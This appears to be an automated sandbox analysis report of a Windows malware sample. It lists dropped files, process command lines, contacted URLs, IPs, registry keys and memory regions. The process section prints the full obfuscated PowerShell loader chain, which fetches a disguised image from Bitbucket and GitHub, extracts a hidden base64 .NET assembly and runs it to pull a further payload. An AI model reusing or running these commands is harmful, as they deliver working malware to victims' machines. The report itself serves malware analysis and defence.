Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
OTO2wVGgkl.exe
|
PE32+ executable (GUI) x86-64, for MS Windows
|
initial sample
|
 |
|
|
C:\Users\user\AppData\Local\Temp\IXP000.TMP\123.vbs
|
ASCII text, with CRLF line terminators
|
dropped
|
|
|
|
C:\ProgramData\Microsoft\Network\Downloader\edb.log
|
data
|
dropped
|
||
|
C:\ProgramData\Microsoft\Network\Downloader\qmgr.db
|
Extensible storage user DataBase, version 0x620, checksum 0xba3d4c64, page size 16384, DirtyShutdown, Windows version 10.0
|
dropped
|
||
|
C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\RegAsm.exe.log
|
ASCII text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_itjzzu2l.pm1.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jqsczsg5.xe4.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_l0nb5tch.aft.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mkcd0xhi.wn1.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rioed2h5.n30.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_worwp5ks.wos.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
|
JSON data
|
dropped
|
There are 4 hidden files, click here to show them.
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Users\user\Desktop\OTO2wVGgkl.exe
|
"C:\Users\user\Desktop\OTO2wVGgkl.exe"
|
|
|
|
C:\Windows\System32\cmd.exe
|
cmd.exe /c 123.vbs
|
|
|
|
C:\Windows\System32\wscript.exe
|
"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IXP000.TMP\123.vbs"
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$codigo = 'WwBO#GU#d##u#FM#ZQBy#HY#aQBj#GU#U#Bv#Gk#bgB0#E0#YQBu#GE#ZwBl#HI#XQ#6#Do#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b##g#D0#I#Bb#E4#ZQB0#C4#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b#BU#Hk#c#Bl#F0#Og#6#FQ#b#Bz#DE#Mg#N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgB1#G4#YwB0#Gk#bwBu#C##R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#RgBy#G8#bQBM#Gk#bgBr#HM#I#B7#C##c#Bh#HI#YQBt#C##K#Bb#HM#d#By#Gk#bgBn#Fs#XQBd#CQ#b#Bp#G4#awBz#Ck#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#B3#GU#YgBD#Gw#aQBl#G4#d##g#D0#I#BO#GU#dw#t#E8#YgBq#GU#YwB0#C##UwB5#HM#d#Bl#G0#LgBO#GU#d##u#Fc#ZQBi#EM#b#Bp#GU#bgB0#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#C##PQ#g#Ec#ZQB0#C0#UgBh#G4#Z#Bv#G0#I##t#Ek#bgBw#HU#d#BP#GI#agBl#GM#d##g#CQ#b#Bp#G4#awBz#C##LQBD#G8#dQBu#HQ#I##k#Gw#aQBu#Gs#cw#u#Ew#ZQBu#Gc#d#Bo#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgBv#HI#ZQBh#GM#a##g#Cg#J#Bs#Gk#bgBr#C##aQBu#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#Ck#I#B7#C##d#By#Hk#I#B7#C##cgBl#HQ#dQBy#G4#I##k#Hc#ZQBi#EM#b#Bp#GU#bgB0#C4#R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#K##k#Gw#aQBu#Gs#KQ#g#H0#I#Bj#GE#d#Bj#Gg#I#B7#C##YwBv#G4#d#Bp#G4#dQBl#C##fQ#g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I#By#GU#d#B1#HI#bg#g#CQ#bgB1#Gw#b##g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#Gw#aQBu#Gs#cw#g#D0#I#B##Cg#JwBo#HQ#d#Bw#HM#Og#v#C8#YgBp#HQ#YgB1#GM#awBl#HQ#LgBv#HI#Zw#v#Gc#Z#Bm#GY#ZgBm#GY#ZgBm#GY#LwBk#GQ#Z#Bk#GQ#LwBk#G8#dwBu#Gw#bwBh#GQ#cw#v#Gk#bQBn#F8#d#Bl#HM#d##u#Go#c#Bn#D8#MQ#x#Dg#MQ#x#Dc#Mw#1#Cc#L##g#Cc#a#B0#HQ#c#Bz#Do#Lw#v#HI#YQB3#C4#ZwBp#HQ#a#B1#GI#dQBz#GU#cgBj#G8#bgB0#GU#bgB0#C4#YwBv#G0#LwBz#GE#bgB0#G8#bQBh#Gw#bw#v#GE#dQBk#Gk#d##v#G0#YQBp#G4#LwBp#G0#ZwBf#HQ#ZQBz#HQ#LgBq#H##Zw#/#DE#N##0#DQ#MQ#3#DI#Mw#n#Ck#Ow#N##o#I##g#C##I##g#C##I##g#C##I##g#C##I##k#Gk#bQBh#Gc#ZQBC#Hk#d#Bl#HM#I##9#C##R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#RgBy#G8#bQBM#Gk#bgBr#HM#I##k#Gw#aQBu#Gs#cw#7##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##g#Gk#Zg#g#Cg#J#Bp#G0#YQBn#GU#QgB5#HQ#ZQBz#C##LQBu#GU#I##k#G4#dQBs#Gw#KQ#g#Hs#I##k#Gk#bQBh#Gc#ZQBU#GU#e#B0#C##PQ#g#Fs#UwB5#HM#d#Bl#G0#LgBU#GU#e#B0#C4#RQBu#GM#bwBk#Gk#bgBn#F0#Og#6#FU#V#BG#Dg#LgBH#GU#d#BT#HQ#cgBp#G4#Zw#o#CQ#aQBt#GE#ZwBl#EI#eQB0#GU#cw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##J#Bz#HQ#YQBy#HQ#RgBs#GE#Zw#g#D0#I##n#Dw#P#BC#EE#UwBF#DY#N#Bf#FM#V#BB#FI#V##+#D4#Jw#7#C##J#Bl#G4#Z#BG#Gw#YQBn#C##PQ#g#Cc#P##8#EI#QQBT#EU#Ng#0#F8#RQBO#EQ#Pg#+#Cc#Ow#g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##g#D0#I##k#Gk#bQBh#Gc#ZQBU#GU#e#B0#C4#SQBu#GQ#ZQB4#E8#Zg#o#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#KQ#7#C##DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#CQ#ZQBu#GQ#SQBu#GQ#ZQB4#C##PQ#g#CQ#aQBt#GE#ZwBl#FQ#ZQB4#HQ#LgBJ#G4#Z#Bl#Hg#TwBm#Cg#J#Bl#G4#Z#BG#Gw#YQBn#Ck#Ow#N##o#I##g#C##I##g#C##I##g#C##I##g#C##I#Bp#GY#I##o#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##g#C0#ZwBl#C##M##g#C0#YQBu#GQ#I##k#GU#bgBk#Ek#bgBk#GU#e##g#C0#ZwB0#C##J#Bz#HQ#YQBy#HQ#SQBu#GQ#ZQB4#Ck#I#B7#C##J#Bz#HQ#YQBy#HQ#SQBu#GQ#ZQB4#C##Kw#9#C##J#Bz#HQ#YQBy#HQ#RgBs#GE#Zw#u#Ew#ZQBu#Gc#d#Bo#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#Bi#GE#cwBl#DY#N#BM#GU#bgBn#HQ#a##g#D0#I##k#GU#bgBk#Ek#bgBk#GU#e##g#C0#I##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#Ow#N##o#I##g#C##I##g#C##I##g#C##I##g#C##I##k#GI#YQBz#GU#Ng#0#EM#bwBt#G0#YQBu#GQ#I##9#C##J#Bp#G0#YQBn#GU#V#Bl#Hg#d##u#FM#dQBi#HM#d#By#Gk#bgBn#Cg#J#Bz#HQ#YQBy#HQ#SQBu#GQ#ZQB4#Cw#I##k#GI#YQBz#GU#Ng#0#Ew#ZQBu#Gc#d#Bo#Ck#Ow#N##o#I##g#C##I##g#C##I##g#C##I##g#C##I##k#GM#bwBt#G0#YQBu#GQ#QgB5#HQ#ZQBz#C##PQ#g#Fs#UwB5#HM#d#Bl#G0#LgBD#G8#bgB2#GU#cgB0#F0#Og#6#EY#cgBv#G0#QgBh#HM#ZQ#2#DQ#UwB0#HI#aQBu#Gc#K##k#GI#YQBz#GU#Ng#0#EM#bwBt#G0#YQBu#GQ#KQ#7#C##J#Bs#G8#YQBk#GU#Z#BB#HM#cwBl#G0#YgBs#Hk#I##9#C##WwBT#Hk#cwB0#GU#bQ#u#FI#ZQBm#Gw#ZQBj#HQ#aQBv#G4#LgBB#HM#cwBl#G0#YgBs#Hk#XQ#6#Do#T#Bv#GE#Z##o#CQ#YwBv#G0#bQBh#G4#Z#BC#Hk#d#Bl#HM#KQ#7#C##J#B0#Hk#c#Bl#C##PQ#g#CQ#b#Bv#GE#Z#Bl#GQ#QQBz#HM#ZQBt#GI#b#B5#C4#RwBl#HQ#V#B5#H##ZQ#o#Cc#d#Bl#HM#d#Bw#G8#dwBl#HI#cwBo#GU#b#Bs#C4#S#Bv#G0#ZQ#n#Ck#Ow#N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#Bt#GU#d#Bo#G8#Z##g#D0#I##k#HQ#eQBw#GU#LgBH#GU#d#BN#GU#d#Bo#G8#Z##o#Cc#b#Bh#Cc#KQ#u#Ek#bgB2#G8#awBl#Cg#J#Bu#HU#b#Bs#Cw#I#Bb#G8#YgBq#GU#YwB0#Fs#XQBd#C##K##n#HQ#e#B0#C4#Ng#w#G8#c##v#HM#Z#Bh#G8#b#Bu#Hc#bwBk#C8#dwBx#HQ#cgBl#HQ#cgBl#C8#awBy#HU#cgBl#G0#b#B1#HI#LwBn#HI#bw#u#HQ#ZQBr#GM#dQBi#HQ#aQBi#C8#Lw#6#HM#c#B0#HQ#a##n#Cw#I##n#D##Jw#s#C##JwBT#HQ#YQBy#HQ#dQBw#E4#YQBt#GU#Jw#s#C##JwBS#GU#ZwBB#HM#bQ#n#Cw#I##n#D##Jw#p#Ck#fQB9##==';$oWjuxd
= [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $codigo.replace('#','A') ));powershell.exe
$OWjuxD .exe -windowstyle hidden -exec
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient;
$shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try
{ return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/gdffffffff/ddddd/downloads/img_test.jpg?11811735',
'https://raw.githubusercontent.com/santomalo/audit/main/img_test.jpg?14441723'); $imageBytes = DownloadDataFromLinks
$links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);
$startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag);
$endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex
+= $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex,
$base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);
$type = $loadedAssembly.GetType('testpowershell.Home'); $method = $type.GetMethod('la').Invoke($null, [object[]]
('txt.60op/sdaolnwod/wqtretre/kruremlur/gro.tekcubtib//:sptth', '0', 'StartupName', 'RegAsm', '0'))}}" .exe -windowstyle hidden
-exec
|
|
|
|
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
|
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\svchost.exe
|
C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
|
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
https://raw.githubusercontent.com
|
unknown
|
|
|
|
https://raw.githubusercontent.com/santomalo/audit/main/img_test.jpg?14441723
|
185.199.111.133
|
|
|
|
https://bitbucket.org/gdffffffff/ddddd/downloads/img_test.jpg?11811735
|
unknown
|
|
|
|
https://bitbucket.org
|
unknown
|
|
|
|
https://bitbucket.org/rulmerurk/ertertqw/downloads/po06.txt
|
185.166.143.48
|
||
|
http://nuget.org/NuGet.exe
|
unknown
|
||
|
https://aka.ms/winsvr-2022-pshelp
|
unknown
|
||
|
https://bbuseruploads.s3.amazonaws.com
|
unknown
|
||
|
http://pesterbdd.com/images/Pester.png
|
unknown
|
||
|
http://schemas.xmlsoap.org/soap/encoding/
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
|
https://go.micro
|
unknown
|
||
|
https://web-security-reports.services.atlassian.com/csp-report/bb-website
|
unknown
|
||
|
https://contoso.com/License
|
unknown
|
||
|
https://contoso.com/Icon
|
unknown
|
||
|
https://aka.ms/winsvr-2022-pshelpX
|
unknown
|
||
|
https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/
|
unknown
|
||
|
https://g.live.com/odclientsettings/ProdV21C:
|
unknown
|
||
|
http://crl.ver)
|
unknown
|
||
|
https://aka.ms/pscore6
|
unknown
|
||
|
https://dz8aopenkvv6s.cloudfront.net
|
unknown
|
||
|
https://github.com/Pester/Pester
|
unknown
|
||
|
https://g.live.com/odclientsettings/Prod1C:
|
unknown
|
||
|
https://bbuseruploads.s3.amazonaws.com/4be491a4-012e-46db-bc28-27fee082b0f0/downloads/74ccc5a3-8670-
|
unknown
|
||
|
https://remote-app-switcher.prod-east.frontend.public.atl-paas.net
|
unknown
|
||
|
http://schemas.xmlsoap.org/wsdl/
|
unknown
|
||
|
https://cdn.cookielaw.org/
|
unknown
|
||
|
https://contoso.com/
|
unknown
|
||
|
https://nuget.org/nuget.exe
|
unknown
|
||
|
https://aui-cdn.atlassian.com/
|
unknown
|
||
|
https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/;
|
unknown
|
||
|
https://remote-app-switcher.stg-east.frontend.public.atl-paas.net
|
unknown
|
||
|
https://aka.ms/pscore68
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
There are 24 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
bitbucket.org
|
185.166.143.48
|
|
|
|
raw.githubusercontent.com
|
185.199.111.133
|
|
|
|
s3-w.us-east-1.amazonaws.com
|
16.182.70.97
|
||
|
bbuseruploads.s3.amazonaws.com
|
unknown
|
||
|
18.31.95.13.in-addr.arpa
|
unknown
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
185.166.143.48
|
bitbucket.org
|
Germany
|
|
|
|
185.199.111.133
|
raw.githubusercontent.com
|
Netherlands
|
|
|
|
16.182.70.97
|
s3-w.us-east-1.amazonaws.com
|
United States
|
||
|
127.0.0.1
|
unknown
|
unknown
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
|
wextract_cleanup0
|
||
|
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
|
LangID
|
||
|
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
|
C:\Windows\System32\WScript.exe.FriendlyAppName
|
||
|
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
|
C:\Windows\System32\WScript.exe.ApplicationCompany
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\BITS
|
PerfMMFileName
|
There are 9 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
1882390A000
|
trusted library allocation
|
page read and write
|
||
|
28F0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD344D0000
|
trusted library allocation
|
page read and write
|
||
|
2A6E000
|
trusted library allocation
|
page read and write
|
||
|
20682068000
|
heap
|
page read and write
|
||
|
7DF4BB0F0000
|
trusted library allocation
|
page execute and read and write
|
||
|
712BCFE000
|
stack
|
page read and write
|
||
|
188234E7000
|
trusted library allocation
|
page read and write
|
||
|
5192000
|
trusted library allocation
|
page read and write
|
||
|
19FF5DD0000
|
heap
|
page read and write
|
||
|
BE9787B000
|
stack
|
page read and write
|
||
|
8570CFE000
|
stack
|
page read and write
|
||
|
25084811000
|
heap
|
page read and write
|
||
|
BE990FB000
|
stack
|
page read and write
|
||
|
2508484F000
|
heap
|
page read and write
|
||
|
1943FAC2000
|
trusted library allocation
|
page read and write
|
||
|
18823606000
|
trusted library allocation
|
page read and write
|
||
|
1943E828000
|
trusted library allocation
|
page read and write
|
||
|
BE983FE000
|
stack
|
page read and write
|
||
|
51A0000
|
trusted library allocation
|
page execute and read and write
|
||
|
460000
|
remote allocation
|
page execute and read and write
|
||
|
BE984FE000
|
unkown
|
page readonly
|
||
|
19FF5DE2000
|
heap
|
page read and write
|
||
|
20682060000
|
heap
|
page read and write
|
||
|
D10000
|
trusted library allocation
|
page read and write
|
||
|
250FFB1B000
|
heap
|
page read and write
|
||
|
19438316000
|
heap
|
page read and write
|
||
|
25080000000
|
trusted library allocation
|
page read and write
|
||
|
18823A7D000
|
trusted library allocation
|
page read and write
|
||
|
8492943000
|
stack
|
page read and write
|
||
|
BE995FA000
|
stack
|
page read and write
|
||
|
5110000
|
trusted library allocation
|
page read and write
|
||
|
20681EF0000
|
heap
|
page read and write
|
||
|
20682033000
|
heap
|
page read and write
|
||
|
19FF5DDE000
|
heap
|
page read and write
|
||
|
BE992FE000
|
unkown
|
page readonly
|
||
|
19FF5DD2000
|
heap
|
page read and write
|
||
|
18821B4C000
|
heap
|
page read and write
|
||
|
712BF3E000
|
stack
|
page read and write
|
||
|
7FFD34424000
|
trusted library allocation
|
page read and write
|
||
|
1943E0CD000
|
trusted library allocation
|
page read and write
|
||
|
1943A335000
|
trusted library allocation
|
page read and write
|
||
|
536C000
|
heap
|
page read and write
|
||
|
C50000
|
heap
|
page read and write
|
||
|
250FF0F0000
|
heap
|
page read and write
|
||
|
84930B9000
|
stack
|
page read and write
|
||
|
28D0000
|
trusted library allocation
|
page execute and read and write
|
||
|
5392000
|
heap
|
page read and write
|
||
|
50CD000
|
trusted library allocation
|
page read and write
|
||
|
1943F962000
|
trusted library allocation
|
page read and write
|
||
|
8570AFE000
|
stack
|
page read and write
|
||
|
1943D63A000
|
trusted library allocation
|
page read and write
|
||
|
BE98DFE000
|
stack
|
page read and write
|
||
|
250FF302000
|
heap
|
page read and write
|
||
|
7FFD34730000
|
trusted library allocation
|
page read and write
|
||
|
250FF2A2000
|
heap
|
page read and write
|
||
|
3ACD000
|
trusted library allocation
|
page read and write
|
||
|
28C3000
|
heap
|
page read and write
|
||
|
BE988FE000
|
unkown
|
page readonly
|
||
|
19FF5A80000
|
heap
|
page read and write
|
||
|
2A31000
|
trusted library allocation
|
page read and write
|
||
|
1883BBB0000
|
heap
|
page read and write
|
||
|
250FF213000
|
heap
|
page read and write
|
||
|
194384F4000
|
heap
|
page read and write
|
||
|
3AD1000
|
trusted library allocation
|
page read and write
|
||
|
84929CE000
|
stack
|
page read and write
|
||
|
2910000
|
heap
|
page read and write
|
||
|
250FF27A000
|
heap
|
page read and write
|
||
|
1943A328000
|
trusted library allocation
|
page read and write
|
||
|
19FF40DD000
|
heap
|
page read and write
|
||
|
19439D46000
|
heap
|
page execute and read and write
|
||
|
19FF40FB000
|
heap
|
page read and write
|
||
|
5354000
|
heap
|
page read and write
|
||
|
2068205B000
|
heap
|
page read and write
|
||
|
19FF4082000
|
heap
|
page read and write
|
||
|
19439D66000
|
heap
|
page read and write
|
||
|
1943C181000
|
trusted library allocation
|
page read and write
|
||
|
D20000
|
trusted library allocation
|
page read and write
|
||
|
19438298000
|
heap
|
page read and write
|
||
|
8493036000
|
stack
|
page read and write
|
||
|
19FF40DB000
|
heap
|
page read and write
|
||
|
4F50000
|
heap
|
page execute and read and write
|
||
|
1943F9F7000
|
trusted library allocation
|
page read and write
|
||
|
8493D8E000
|
stack
|
page read and write
|
||
|
19FF41AA000
|
heap
|
page read and write
|
||
|
7FF6975AE000
|
unkown
|
page readonly
|
||
|
1882364B000
|
trusted library allocation
|
page read and write
|
||
|
4F40000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFD34680000
|
trusted library allocation
|
page read and write
|
||
|
6A748FE000
|
stack
|
page read and write
|
||
|
5C36000
|
heap
|
page read and write
|
||
|
7FFD34630000
|
trusted library allocation
|
page read and write
|
||
|
194382CF000
|
heap
|
page read and write
|
||
|
188234FD000
|
trusted library allocation
|
page read and write
|
||
|
1943A359000
|
trusted library allocation
|
page read and write
|
||
|
188238A8000
|
trusted library allocation
|
page read and write
|
||
|
1943E611000
|
trusted library allocation
|
page read and write
|
||
|
2068205A000
|
heap
|
page read and write
|
||
|
19FF5DF0000
|
heap
|
page read and write
|
||
|
7FF6975A0000
|
unkown
|
page readonly
|
||
|
7FFD34602000
|
trusted library allocation
|
page read and write
|
||
|
AF7000
|
stack
|
page read and write
|
||
|
1943F2B8000
|
trusted library allocation
|
page read and write
|
||
|
8493E0D000
|
stack
|
page read and write
|
||
|
26CE000
|
stack
|
page read and write
|
||
|
5190000
|
trusted library allocation
|
page read and write
|
||
|
188238C6000
|
trusted library allocation
|
page read and write
|
||
|
D22000
|
trusted library allocation
|
page read and write
|
||
|
19439D40000
|
heap
|
page execute and read and write
|
||
|
D26000
|
trusted library allocation
|
page execute and read and write
|
||
|
5350000
|
heap
|
page read and write
|
||
|
19FF40A1000
|
heap
|
page read and write
|
||
|
2A1E000
|
stack
|
page read and write
|
||
|
18821B70000
|
trusted library allocation
|
page read and write
|
||
|
5C10000
|
heap
|
page read and write
|
||
|
1943A318000
|
trusted library allocation
|
page read and write
|
||
|
8492CFE000
|
stack
|
page read and write
|
||
|
BE98EFE000
|
unkown
|
page readonly
|
||
|
1943F7D3000
|
trusted library allocation
|
page read and write
|
||
|
D0D000
|
trusted library allocation
|
page execute and read and write
|
||
|
250FF29F000
|
heap
|
page read and write
|
||
|
1882390F000
|
trusted library allocation
|
page read and write
|
||
|
1943B781000
|
trusted library allocation
|
page read and write
|
||
|
25084900000
|
heap
|
page read and write
|
||
|
1943EDB4000
|
trusted library allocation
|
page read and write
|
||
|
7482000
|
trusted library allocation
|
page read and write
|
||
|
250802F0000
|
trusted library section
|
page readonly
|
||
|
19FF40D0000
|
heap
|
page read and write
|
||
|
188218C0000
|
heap
|
page read and write
|
||
|
1944BDA5000
|
trusted library allocation
|
page read and write
|
||
|
20682060000
|
heap
|
page read and write
|
||
|
270E000
|
stack
|
page read and write
|
||
|
19FF4076000
|
heap
|
page read and write
|
||
|
19FF41A0000
|
heap
|
page read and write
|
||
|
250848F8000
|
heap
|
page read and write
|
||
|
20683D30000
|
heap
|
page read and write
|
||
|
20684730000
|
heap
|
page read and write
|
||
|
712C13E000
|
stack
|
page read and write
|
||
|
54AC000
|
stack
|
page read and write
|
||
|
1883354D000
|
trusted library allocation
|
page read and write
|
||
|
BE991FE000
|
unkown
|
page readonly
|
||
|
25084700000
|
trusted library allocation
|
page read and write
|
||
|
250846A0000
|
trusted library allocation
|
page read and write
|
||
|
18821C4E000
|
heap
|
page read and write
|
||
|
18823921000
|
trusted library allocation
|
page read and write
|
||
|
BE98BFE000
|
unkown
|
page readonly
|
||
|
1943E954000
|
trusted library allocation
|
page read and write
|
||
|
20682018000
|
heap
|
page read and write
|
||
|
20682076000
|
heap
|
page read and write
|
||
|
712BA7E000
|
stack
|
page read and write
|
||
|
50FF000
|
trusted library allocation
|
page read and write
|
||
|
1883BA0A000
|
heap
|
page read and write
|
||
|
D1D000
|
trusted library allocation
|
page execute and read and write
|
||
|
25084870000
|
trusted library allocation
|
page read and write
|
||
|
250FF110000
|
heap
|
page read and write
|
||
|
DAB000
|
heap
|
page read and write
|
||
|
25084884000
|
heap
|
page read and write
|
||
|
250FF1F0000
|
heap
|
page read and write
|
||
|
19FF41AD000
|
heap
|
page read and write
|
||
|
D30000
|
heap
|
page read and write
|
||
|
BE989FE000
|
unkown
|
page readonly
|
||
|
20682076000
|
heap
|
page read and write
|
||
|
18821A93000
|
heap
|
page read and write
|
||
|
19FF40BB000
|
heap
|
page read and write
|
||
|
BE99CFE000
|
unkown
|
page readonly
|
||
|
BE97BF7000
|
stack
|
page read and write
|
||
|
250FF328000
|
heap
|
page read and write
|
||
|
1944A201000
|
trusted library allocation
|
page read and write
|
||
|
7FFD345D1000
|
trusted library allocation
|
page read and write
|
||
|
5505000
|
heap
|
page read and write
|
||
|
D03000
|
trusted library allocation
|
page execute and read and write
|
||
|
19FF5DD4000
|
heap
|
page read and write
|
||
|
85711FE000
|
stack
|
page read and write
|
||
|
468000
|
remote allocation
|
page execute and read and write
|
||
|
BE987FE000
|
unkown
|
page readonly
|
||
|
18821C40000
|
heap
|
page read and write
|
||
|
2068203B000
|
heap
|
page read and write
|
||
|
188334E1000
|
trusted library allocation
|
page read and write
|
||
|
1943F44F000
|
trusted library allocation
|
page read and write
|
||
|
C80000
|
heap
|
page read and write
|
||
|
188234E1000
|
trusted library allocation
|
page read and write
|
||
|
84932BE000
|
stack
|
page read and write
|
||
|
19FF409B000
|
heap
|
page read and write
|
||
|
250FFA02000
|
heap
|
page read and write
|
||
|
18821B90000
|
trusted library allocation
|
page read and write
|
||
|
50C1000
|
trusted library allocation
|
page read and write
|
||
|
1943F134000
|
trusted library allocation
|
page read and write
|
||
|
5358000
|
heap
|
page read and write
|
||
|
18821B48000
|
heap
|
page read and write
|
||
|
250FFB13000
|
heap
|
page read and write
|
||
|
250FFB1A000
|
heap
|
page read and write
|
||
|
BE97FFC000
|
stack
|
page read and write
|
||
|
8493F0B000
|
stack
|
page read and write
|
||
|
849323F000
|
stack
|
page read and write
|
||
|
1883B9DD000
|
heap
|
page read and write
|
||
|
250848F3000
|
heap
|
page read and write
|
||
|
25080310000
|
trusted library section
|
page readonly
|
||
|
8493F8C000
|
stack
|
page read and write
|
||
|
188234D0000
|
heap
|
page read and write
|
||
|
20682071000
|
heap
